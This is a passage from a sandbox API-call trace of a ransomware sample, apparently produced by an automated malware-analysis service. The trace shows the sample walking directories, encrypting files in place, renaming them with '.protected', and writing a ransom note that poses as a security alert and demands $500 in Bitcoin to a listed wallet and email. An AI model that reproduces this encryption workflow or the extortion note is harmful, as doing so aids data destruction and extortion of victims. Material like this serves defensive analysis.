lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.610] CloseHandle (hObject=0xa4) returned 1 [0073.610] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.610] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Windows") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0073.611] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="System Volume Information") returned -1 [0073.611] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 82 [0073.611] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0073.611] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0073.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned 84 [0073.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.611] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\.") returned 84 [0073.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.612] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.612] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\..") returned 85 [0073.612] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.612] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 91 [0073.612] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.612] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned 93 [0073.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\.") returned 93 [0073.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.613] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\..") returned 94 [0073.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0073.613] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 117 [0073.613] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0073.613] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0073.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.614] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\.") returned 119 [0073.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.614] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\..") returned 120 [0073.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.614] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.614] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0073.614] lstrcmpW (lpString1="cab1.cab", 
lpString2="RESTORE_FILES.txt") returned -1 [0073.614] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.614] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.616] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.616] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0073.617] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.617] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0073.617] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.617] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0073.617] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.618] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.618] 
WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.618] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.618] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.646] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.646] CloseHandle (hObject=0xd8) returned 1 [0073.713] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 136 [0073.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0073.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") 
returned -1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0073.713] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.713] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0073.713] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0073.713] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.713] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.714] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", 
lpSrch=".txt") returned 0x0 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0073.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.774] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.774] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.775] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.775] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.775] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.776] CloseHandle (hObject=0xd8) returned 1 [0073.776] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 156 [0073.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0073.777] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.777] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 135 [0073.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.818] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.818] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.819] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.819] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.819] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.819] CloseHandle (hObject=0xd4) returned 1 [0073.820] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.820] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.820] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0073.820] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.860] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.860] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
